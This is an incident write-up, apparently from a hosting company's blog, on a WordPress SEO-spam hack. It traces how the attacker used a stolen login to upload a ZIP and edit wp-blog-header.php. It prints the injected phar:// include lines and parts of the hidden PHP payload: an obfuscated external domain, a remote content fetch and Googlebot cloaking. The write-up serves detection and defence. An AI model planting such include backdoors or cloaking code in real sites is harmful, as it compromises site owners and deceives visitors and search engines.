Infiniroot Blog: We sometimes write, too.


Wordpress (Japanese SEO) hack extracting and executing code from uploaded ZIP file

Published on August 26th 2022


Wordpress is currently the world's most used web application CMS. It is therefore no surprise that Wordpress installations are attacked very often. While the way an attacker gets access to the file system is almost always identical (either by using a security vulnerability or by using an existing login with weak or brute-forced credentials), the steps afterwards are different.

Some of the attackers might just upload some scripts sending out thousands of spam e-mails. Others might execute scripts and processes which attack other Wordpress installations. Yet others manipulate the content of the Wordpress pages. There are many possibilities of what a successful attacker could do with a hacked Wordpress site.

This hack, which we discovered in the past couple of days, is something we haven't seen before and is thus worth writing about. But let's start at the beginning.

Japanese characters are showing up on Google in search results

It all started with something very strange. The affected website, running Wordpress 6.x, suddenly appeared with Japanese characters in Google search results.

Japanese characters show up in Google results of hacked Wordpress site

At first no hack was suspected. Maybe the site in question is multilingual and there was an issue with an SEO plugin? Or could it be something else?

Note: Some quick research pointed to a "Japanese keyword hack", described on web.dev. Although that site describes similar symptoms, it offers no technical information explaining how this hack works and where the malicious files are located.

However, a manual request to the Wordpress site revealed something very interesting. A plain curl command showed that the correct and expected content was loaded. But when the User-Agent was changed to Googlebot (-A "Googlebot"), the response body changed:

Different HTTP response with Japanese characters when using Googlebot as User-Agent

Completely different content, in Japanese, is loaded in this situation. Opening one of the local links mentioned in the response (/4244wpjv43a.html) indeed shows a Japanese page including pictures:

A page with Japanese content is showing on the Wordpress site

Time to dig deeper to find out where this is coming from.

Malware scanners find nothing

A hacked Wordpress. Been there, done that, as we offer this kind of remote server troubleshooting/analysis to our customers. Our first guess was a manipulated or additional plugin installed by the attacker. Usually malicious code can be found quickly by using malware scanners, such as php-malware-scanner. Although there were a couple of results hinting at malicious code, after examining each file they all turned out to be false positives.

Could the Japanese content be in the database? But even searching through the database dump did not reveal any Japanese content, let alone manipulated posts.

A grep through all files inside the Wordpress installation, using multiple words found in the response body, did not show any results either.

Where does this content come from?! We were definitely scratching our heads at this point.

Tcpdump shows external HTTP GET - on every request

We decided to switch gears and change focus to the network. Is there any unusual (outgoing) network activity happening whenever a request arrives on the Wordpress site? We fired up tcpdump and listened on the Internet-facing interface. And indeed, a couple of seconds later we were faced with some promising results.

root@wordpress:~# tcpdump -i eth0 port 80 -X
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
17:54:54.399661 IP www.example.com.43018 > 173.208.198.115.http: Flags [S], seq 3867413820, win 64240, options [mss 1460,sackOK,TS val 3891515490 ecr 0,nop,wscale 7], length 0
    0x0000:  4500 003c bb3f 4000 4006 ad18 2d4d 30d3  E..<.?@.@...-M0.
    0x0010:  add0 c673 a80a 0050 e684 0d3c 0000 0000  ...s...P...<....
    0x0020:  a002 faf0 d292 0000 0204 05b4 0402 080a  ................
    0x0030:  e7f3 d062 0000 0000 0103 0307            ...b........
17:54:54.595456 IP 173.208.198.115.http > www.example.com.43018: Flags [S.], seq 3526600846, ack 3867413821, win 28960, options [mss 1460,sackOK,TS val 879320330 ecr 3891515490,nop,wscale 7], length 0
    0x0000:  4500 003c 0000 4000 3206 7658 add0 c673  E..<..@.2.vX...s
    0x0010:  2d4d 30d3 0050 a80a d233 a88e e684 0d3d  -M0..P...3.....=
    0x0020:  a012 7120 a3c2 0000 0204 05b4 0402 080a  ..q.............
    0x0030:  3469 5d0a e7f3 d062 0103 0307            4i]....b....
17:54:54.595540 IP www.example.com.43018 > 173.208.198.115.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3891515686 ecr 879320330], length 0
    0x0000:  4500 0034 bb40 4000 4006 ad1f 2d4d 30d3  E..4.@@.@...-M0.
    0x0010:  add0 c673 a80a 0050 e684 0d3d d233 a88f  ...s...P...=.3..
    0x0020:  8010 01f6 d28a 0000 0101 080a e7f3 d126  ...............&
    0x0030:  3469 5d0a                                4i].
17:54:54.595657 IP www.example.com.43018 > 173.208.198.115.http: Flags [P.], seq 1:168, ack 1, win 502, options [nop,nop,TS val 3891515686 ecr 879320330], length 167: HTTP: GET /indexnew.php?web=www.example.com&zz=1&uri=LzgwMDFreGtyZmF5YjAuaHRtbA==&urlshang=&http=https&lang= HTTP/1.1
    0x0000:  4500 00db bb41 4000 4006 ac77 2d4d 30d3  E....A@.@..w-M0.
    0x0010:  add0 c673 a80a 0050 e684 0d3d d233 a88f  ...s...P...=.3..
    0x0020:  8018 01f6 d331 0000 0101 080a e7f3 d126  .....1.........&
    0x0030:  3469 5d0a 4745 5420 2f69 6e64 6578 6e65  4i].GET./indexne
    0x0040:  772e 7068 703f 7765 623d 7777 772e 7065  w.php?web=www.ex
    0x0050:  7265 6e6e 6961 6c2e 6e65 742e 6175 267a  ample.com&z
    0x0060:  7a3d 3126 7572 693d 4c7a 6777 4d44 4672  z=1&uri=LzgwMDFr
    0x0070:  6547 7479 5a6d 4635 596a 4175 6148 5274  eGtyZmF5YjAuaHRt
    0x0080:  6241 3d3d 2675 726c 7368 616e 673d 2668  bA==&urlshang=&h
    0x0090:  7474 703d 6874 7470 7326 6c61 6e67 3d20  ttp=https&lang=.
    0x00a0:  4854 5450 2f31 2e31 0d0a 486f 7374 3a20  HTTP/1.1..Host:.
    0x00b0:  6761 6569 6768 7479 7468 7265 6569 782e  gaeightythreeix.
    0x00c0:  7261 7967 756e 2e74 6f70 0d0a 4163 6365  raygun.top..Acce
    0x00d0:  7074 3a20 2a2f 2a0d 0a0d 0a              pt:.*/*....
17:54:54.791643 IP 173.208.198.115.http > www.example.com.43018: Flags [.], ack 168, win 235, options [nop,nop,TS val 879320526 ecr 3891515686], length 0
    0x0000:  4500 0034 f541 4000 3206 811e add0 c673  E..4.A@.2......s
    0x0010:  2d4d 30d3 0050 a80a d233 a88f e684 0de4  -M0..P...3......
    0x0020:  8010 00eb 4095 0000 0101 080a 3469 5dce  ....@.......4i].
    0x0030:  e7f3 d126                                ...&
17:54:54.800227 IP 173.208.198.115.http > www.example.com.43018: Flags [.], seq 1:2897, ack 168, win 235, options [nop,nop,TS val 879320534 ecr 3891515686], length 2896: HTTP: HTTP/1.1 200 OK

Tcpdump reveals that an HTTP request was sent to the domain gaeightythreeix.raygun.top, using the URL path /indexnew.php and sending GET parameters containing the domain of this Wordpress installation.
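The uri parameter in the captured request looks like Base64. The following is a minimal Python sketch that splits the query string seen in the tcpdump output and decodes that parameter. The helper name decode_beacon is our own, and treating uri as plain Base64 is an assumption based on its appearance.

```python
import base64
from urllib.parse import urlsplit, parse_qs

# Request target exactly as captured by tcpdump (host name anonymized).
CAPTURED = ("/indexnew.php?web=www.example.com&zz=1"
            "&uri=LzgwMDFreGtyZmF5YjAuaHRtbA==&urlshang=&http=https&lang=")


def decode_beacon(request_target: str) -> dict:
    """Return the GET parameters, with 'uri' Base64-decoded.

    Assumption: 'uri' is plain Base64; the other parameters are left as-is.
    """
    query = urlsplit(request_target).query
    # keep_blank_values keeps empty parameters such as 'urlshang' and 'lang'.
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    params["uri"] = base64.b64decode(params["uri"]).decode("utf-8")
    return params


for name, value in decode_beacon(CAPTURED).items():
    print(f"{name} = {value!r}")
```

For the captured request the uri value decodes to /8001kxkrfayb0.html, which looks like the path that was requested on the Wordpress site.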

The Japanese content: It comes from a remote server!

Opening the same URL on this external domain in a browser shows the same Japanese content.

Japanese content is loaded from an external server

Depending on the GET parameters the content is (randomly?) adjusted and shows a different product. Here the "web" parameter is adjusted to some other domain and the content changes:

Japanese content changes depending on the GET parameters

With this information we now know that the content is loaded from an external URL and "placed" on top of the Wordpress site. Now it makes sense we were not able to grep anything relating to the content - neither in the database nor in the Wordpress files.

But at this point we still do not know which script or plugin is loading the content from gaeightythreeix.raygun.top. Even a grep for this domain did not reveal the responsible file!

File tracing using bpftrace

We decided to bring out the big guns now. To identify all the files which are opened (sys_enter_openat) on each request to this Wordpress site, we used bpftrace, a very powerful tool to trace syscalls in the Linux kernel, comparable to dtrace on Solaris. The hope was to catch anything out of the ordinary, although a Wordpress installation with a lot of plugins produces a lot of opened files in the output. To reduce the output to PHP processes only, we used bpftrace with the /comm == "php-fpm7.4"/ filter. And we weren't disappointed!

root@wordpress:~# bpftrace -e 'tracepoint:syscalls:sys_enter_openat /comm == "php-fpm7.4"/ { printf("%s %s\n", comm, str(args->filename)); }'
Attaching 1 probe...
[...]
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/uploads/2021/index.zip
php-fpm7.4 /etc/hosts
[...]

Of course the zip file caught our interest as we didn't expect a zip file to show up in the list of opened files. And to our surprise the zip file popped up on every HTTP request on the affected Wordpress site. Let's take a closer look at this zip file.
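On a site with many plugins the trace output gets long quickly. The following Python sketch filters it, assuming the "comm path" line format printed by the bpftrace one-liner. The list of suspicious extensions, the uploads marker and the function name are our own illustrative choices, not a complete rule set.

```python
# Extensions a PHP worker normally has little reason to open (illustrative assumption).
SUSPICIOUS_EXTENSIONS = (".zip", ".phar", ".tar", ".gz")


def suspicious_opens(lines, upload_marker="/wp-content/uploads/"):
    """Yield each suspicious path once from 'comm path' trace lines.

    A path is flagged if it is an archive, or a PHP file below the uploads folder.
    """
    seen = set()
    for line in lines:
        parts = line.strip().split(None, 1)
        if len(parts) != 2:
            continue  # e.g. "[...]" or empty lines
        _comm, path = parts
        if not path.startswith("/") or path in seen:
            continue  # banner lines such as "Attaching 1 probe..." or repeats
        lower = path.lower()
        is_archive = lower.endswith(SUSPICIOUS_EXTENSIONS)
        is_php_in_uploads = upload_marker in lower and lower.endswith(".php")
        if is_archive or is_php_in_uploads:
            seen.add(path)
            yield path


# Sample lines taken from the trace output shown in this article.
SAMPLE = [
    "Attaching 1 probe...",
    "php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module",
    "php-fpm7.4 /var/www/www.example.com/wp-content/uploads/2021/index.zip",
    "php-fpm7.4 /etc/hosts",
]

for hit in suspicious_opens(SAMPLE):
    print(hit)
```

The same function accepts any iterable of lines, so the live bpftrace output could be piped into a script that passes sys.stdin to it.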

Malicious PHP code inside the ZIP file

According to the timestamp, the zip file was uploaded a couple of days ago:

root@wordpress:~# ls -la /var/www/www.example.com/wp-content/uploads/2021/index.zip
-rw-r--r-- 1 www-data www-data 1922 Aug 16 19:39 /var/www/www.example.com/wp-content/uploads/2021/index.zip

Inside the index.zip file a file index.php can be found:

root@wordpress:~# unzip /var/www/www.example.com/wp-content/uploads/2021/index.zip -d /tmp/claudio
Archive:  /var/www/www.example.com/wp-content/uploads/2021/index.zip
  inflating: /tmp/claudio/index.php

root@wordpress:~# cd /tmp/claudio
root@wordpress:/tmp/claudio# ls -la
total 44
drwxr-xr-x  2 root root  4096 Aug 22 19:01 ./
drwxrwxrwt 24 root root 32768 Aug 22 19:01 ../
-rw-r--r--  1 root root  6058 Aug 16 14:18 index.php

Taking a look at this index.php file finally reveals the malicious code which loads the Japanese content from an external site.

PHP code responsible for Japanese keyword/SEO hack

The file contains 173 lines. Let's look at the most important code snippets.

Almost at the top we can spot the $xmlname variable, containing a couple of characters. By running urldecode() on $xmlname we get the following string: tnrvtuglguerrvk.enltha.gbc.
By running this string through the str_rot13() function, we obtain the following string: gaeightythreeix.raygun.top.

Sounds familiar, right? This is the external domain used to load the Japanese content; the script stores it in the $goweb variable.
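The two decoding steps can be reproduced outside PHP. This is a small Python sketch that mirrors str_rot13(urldecode(...)). Since the exact $xmlname value is not reproduced in this article, the percent-encoded input below is a hypothetical stand-in built from the known intermediate string.

```python
import codecs
from urllib.parse import unquote_plus


def decode_domain(obfuscated: str) -> str:
    """Mirror PHP's str_rot13(urldecode($value))."""
    # unquote_plus matches urldecode(): it also turns '+' into a space.
    return codecs.decode(unquote_plus(obfuscated), "rot13")


# String obtained after urldecode(), as quoted in the article.
after_urldecode = "tnrvtuglguerrvk.enltha.gbc"

# Hypothetical percent-encoded form (assumption): every character is
# percent-encoded purely for illustration.
percent_encoded = "".join(f"%{ord(ch):02X}" for ch in after_urldecode)

print(decode_domain(after_urldecode))
print(decode_domain(percent_encoded))
```

Both calls print gaeightythreeix.raygun.top. ROT13 is its own inverse, which also explains why a grep for the plain domain name found nothing: the name never appears in clear text on disk.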

Later on in this script is the actual content retrieval from the external URL:

$web = $http_web . '://' . $goweb . '/indexnew.php?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang;
$html_content = trim(doutdo($web));

And a few lines further down we can find a function disbot() which reads the HTTP User-Agent from the HTTP request:

function disbot()
{
    $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) {
        return true;
    } else {
        return false;
    }
}

This function is responsible for distinguishing user agents so that different content can be shown depending on the User-Agent. Remember the curl -A "Googlebot" at the beginning? This is what triggered this function to return true and reveal the Japanese content.
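The same check can be turned around to test a site for this kind of cloaking. The sketch below is our own illustration: is_search_bot mirrors the substring logic of disbot(), and is_cloaked compares the response bodies for two User-Agents. The fetch function is injected (an assumption made so the example runs without network access); in practice it would wrap an HTTP client that sets the User-Agent header.

```python
from typing import Callable

# Substrings checked by disbot(), without the duplicates.
BOT_MARKERS = ("googlebot", "bing", "yahoo", "google")


def is_search_bot(user_agent: str) -> bool:
    """Python equivalent of disbot(): case-insensitive substring match."""
    ua = user_agent.lower()
    return any(marker in ua for marker in BOT_MARKERS)


def is_cloaked(fetch: Callable[[str], str],
               browser_ua: str = "Mozilla/5.0",
               bot_ua: str = "Googlebot") -> bool:
    """Fetch the same page with two User-Agents and report whether the bodies differ.

    `fetch` takes a User-Agent string and returns the response body.
    """
    return fetch(browser_ua) != fetch(bot_ua)


def fake_site(user_agent: str) -> str:
    """Offline stand-in that behaves like the hacked site (hypothetical)."""
    return "spam page" if is_search_bot(user_agent) else "regular page"


print(is_cloaked(fake_site))
```

A plain inequality test is deliberately crude: dynamic pages can differ between two requests for harmless reasons (nonces, timestamps), so a real check would compare titles or look for unexpected character sets instead.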

Alright, we have now identified the malicious code, which is loaded from within a zip file at every request on this Wordpress site. But we haven't yet found the script which actually loads and reads the content from the zip file.

Wordpress includes content from a phar archive

In yet another search across all files, this time we focused on the string "zip". And promptly we found another manipulated file: wp-blog-header.php. This PHP script is part of the original Wordpress installation but was modified by the hacker:

root@wordpress:~# cat /var/www/www.example.com/wp-blog-header.php
<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

    $wp_did_header = true;

    // Load the WordPress library.
    require_once __DIR__ . '/wp-load.php';
    $file = 'index';
    $upload_dir = wp_upload_dir();
    $folder = $upload_dir['basedir'] . "/2021/$file.zip/$file.php";
    include('phar://'.$folder);


    // Set up the WordPress query.
    wp();

    // Load the theme template.
    require_once ABSPATH . WPINC . '/template-loader.php';

}

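Note: The manipulated (added) code consists of the four lines directly after the require_once of wp-load.php: the assignments of $file, $upload_dir and $folder, and the include() call.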

The wp-blog-header.php file is loaded on every request of Wordpress and was modified to load content (include) from a phar archive, pointing to, surprise surprise, the index.zip file!

To be honest, until this day I personally didn't even know you could include zipped PHP code on the fly using PHP's phar:// stream wrapper. This is certainly a very unusual and interesting approach!

And it proved to be very effective, because malware scanners mainly focus on typical code patterns, such as calls to base64_decode() or variables that use nested variables as their value.
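Knowing the technique, a targeted search becomes straightforward. The following Python sketch looks for the two artifacts found in this case: PHP files that mention the phar:// wrapper, and ZIP archives that contain PHP files. The function names are our own, and the checks are assumptions about what is worth flagging; an attacker could obfuscate the wrapper string, so an empty result proves nothing.

```python
import os
import re
import zipfile

PHAR_PATTERN = re.compile(rb"phar://", re.IGNORECASE)


def find_phar_references(root: str) -> list:
    """Return PHP files below root whose source mentions the phar:// wrapper."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as handle:
                    if PHAR_PATTERN.search(handle.read()):
                        hits.append(path)
    return sorted(hits)


def find_archives_with_php(root: str) -> list:
    """Return ZIP files below root that contain at least one .php member."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            # is_zipfile checks the file signature, not the file extension.
            if zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as archive:
                    members = archive.namelist()
                if any(member.lower().endswith(".php") for member in members):
                    hits.append(path)
    return sorted(hits)
```

On the affected site, calling both functions with the document root (/var/www/www.example.com) would be expected to report wp-blog-header.php and wp-content/uploads/2021/index.zip respectively. Legitimate plugins may also use phar://, so each hit still needs a manual look.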

We have now understood how this Japanese SEO hack works, technically speaking. But we do not know yet how this zip file was uploaded and how wp-blog-header.php was modified.

Tracing the origin: A successful login

At this point we are back to the very first part of this article: What is the entry point? Was it a vulnerability in Wordpress or one of its plugins or themes? Or was a Wordpress account cracked and used to do the manipulations?

Searching the access logs around the time the zip file was created, we found the following HTTP request, which belongs to the upload of the index.zip file through the wp_file_manager plugin:

204.188.232.195 - - [16/Aug/2022:19:39:40 +1000] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=f2d6e6cb20&networkhref=&cmd=ls&target=l1_d3AtY29udGVudC91cGxvYWRzLzIwMjE&intersect%5B%5D=index.zip&reqid=182a605e43a334&_fs_blog_admin=true HTTP/2.0" 200 11 "https://www.example.com/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

Taking a closer look at the requests from this IP shows the installation of the wp_file_manager plugin a few minutes earlier:

204.188.232.195 - - [16/Aug/2022:19:36:12 +1000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/2.0" 200 9103 "https://www.example.com/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

This plugin was then used to upload the zip file (we already knew that) but also to modify the wp-blog-header.php file:

204.188.232.195 - - [16/Aug/2022:19:39:50 +1000] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=f2d6e6cb20&networkhref=&cmd=ls&target=l1_Lw&intersect%5B%5D=wp-blog-header.php&reqid=182a6060bc3343&_fs_blog_admin=true HTTP/2.0" 200 81 "https://www.example.com/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
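The target parameter in these file manager requests is not random. The Python sketch below decodes it under the assumption that it consists of a volume prefix (l1_) followed by URL-safe Base64 without padding, which is the scheme elFinder-style file managers commonly use. The function names are our own.

```python
import base64
from urllib.parse import urlsplit, parse_qs


def decode_target(target: str) -> str:
    """Decode a file manager target such as 'l1_Lw'.

    Assumption: '<volume id>_' followed by URL-safe Base64 without padding.
    """
    _volume, _sep, encoded = target.partition("_")
    padded = encoded + "=" * (-len(encoded) % 4)  # restore stripped padding
    return base64.urlsafe_b64decode(padded).decode("utf-8")


def describe_request(request_target: str) -> str:
    """Summarise command, decoded directory and file name of one logged request."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    cmd = params["cmd"][0]
    directory = decode_target(params["target"][0])
    name = params.get("intersect[]", [""])[0]  # %5B%5D is decoded to []
    return f"{cmd} {directory} {name}"


# Request targets copied from the two log lines in this section.
ZIP_REQUEST = ("/wp-admin/admin-ajax.php?action=mk_file_folder_manager"
               "&_wpnonce=f2d6e6cb20&networkhref=&cmd=ls"
               "&target=l1_d3AtY29udGVudC91cGxvYWRzLzIwMjE"
               "&intersect%5B%5D=index.zip&reqid=182a605e43a334&_fs_blog_admin=true")
HEADER_REQUEST = ("/wp-admin/admin-ajax.php?action=mk_file_folder_manager"
                  "&_wpnonce=f2d6e6cb20&networkhref=&cmd=ls&target=l1_Lw"
                  "&intersect%5B%5D=wp-blog-header.php&reqid=182a6060bc3343"
                  "&_fs_blog_admin=true")

print(describe_request(ZIP_REQUEST))
print(describe_request(HEADER_REQUEST))
```

The first target decodes to wp-content/uploads/2021 and the second to /, which matches the locations of index.zip and wp-blog-header.php. As far as we understand this kind of file manager, an ls command with an intersect[] list is the check for an existing file name made right before a file is written.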

Tracing the requests back to the very first requests shows a successful login (without any prior brute-force attack, from this IP anyway) on the Wordpress backend:

204.188.232.195 - - [16/Aug/2022:19:33:42 +1000] "GET /wp-login.php HTTP/2.0" 200 2253 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

204.188.232.195 - - [16/Aug/2022:19:34:11 +1000] "POST /wp-login.php HTTP/2.0" 200 2300 "https://www.example.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

204.188.232.195 - - [16/Aug/2022:19:35:05 +1000] "POST /wp-login.php HTTP/2.0" 302 0 "https://www.example.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

204.188.232.195 - - [16/Aug/2022:19:35:08 +1000] "GET /wp-admin/ HTTP/2.0" 200 71258 "https://www.example.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

It took the attacker two attempts to log in to the Wordpress backend: the first POST returned 200 (the login form again), the second one 302 (a redirect, followed by the request to /wp-admin/). The pauses between the requests (29 seconds before the first attempt, another 54 seconds before the second) could mean the password was looked up on a list and copied from there. This means: The password was known. Either it came from a past data breach and the user had reused the same password on this Wordpress site, or it was captured by a trojan or password sniffer on the user's computer.
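The timing of the login sequence can be extracted from the access log with a few lines of Python. This sketch assumes the combined log format shown above; the log lines are shortened copies (referer and User-Agent omitted) and the helper names are our own.

```python
import re
from datetime import datetime

# ip, timestamp, method, path and status of a combined-format log line.
LOG_PATTERN = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Shortened copies of the login-related log lines from this article.
LINES = [
    '204.188.232.195 - - [16/Aug/2022:19:33:42 +1000] "GET /wp-login.php HTTP/2.0" 200 2253',
    '204.188.232.195 - - [16/Aug/2022:19:34:11 +1000] "POST /wp-login.php HTTP/2.0" 200 2300',
    '204.188.232.195 - - [16/Aug/2022:19:35:05 +1000] "POST /wp-login.php HTTP/2.0" 302 0',
    '204.188.232.195 - - [16/Aug/2022:19:35:08 +1000] "GET /wp-admin/ HTTP/2.0" 200 71258',
]


def parse(line: str):
    """Return (ip, datetime, method, path, status) or None if the line does not match."""
    match = LOG_PATTERN.match(line)
    if not match:
        return None
    ip, stamp, method, path, status = match.groups()
    when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path, int(status)


def gaps_in_seconds(lines, ip: str) -> list:
    """Seconds between consecutive requests of one client IP."""
    times = sorted(entry[1] for entry in map(parse, lines) if entry and entry[0] == ip)
    return [int((later - earlier).total_seconds())
            for earlier, later in zip(times, times[1:])]


print(gaps_in_seconds(LINES, "204.188.232.195"))
```

For the four requests above this yields gaps of 29, 54 and 3 seconds. Pauses of that length fit a human typing or pasting credentials better than an automated brute-force run.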

TL;DR: This is the Japanese keyword/SEO hack

The Japanese keyword/SEO hack is a hack where a Wordpress installation gets manipulated to load external (Japanese) content for specific user agents, such as Googlebot. The goal is most likely to trick Google's bots and manipulate Google's search results for certain products.

The PHP code responsible for loading the external content on top of Wordpress is stored in a ZIP file and included from that archive on every request, using PHP's phar:// stream wrapper.

This type of hack, using a dynamically loaded zip file, was new to us, which made it difficult to detect. Malware scanners might not yet be aware of this type of code inclusion either, and it might take some time until they know what to look for.

Technically speaking, this is a very nicely executed and well hidden hack. However, in this case it was only possible because of an insecure or leaked password of an existing Wordpress user, which would have been avoidable.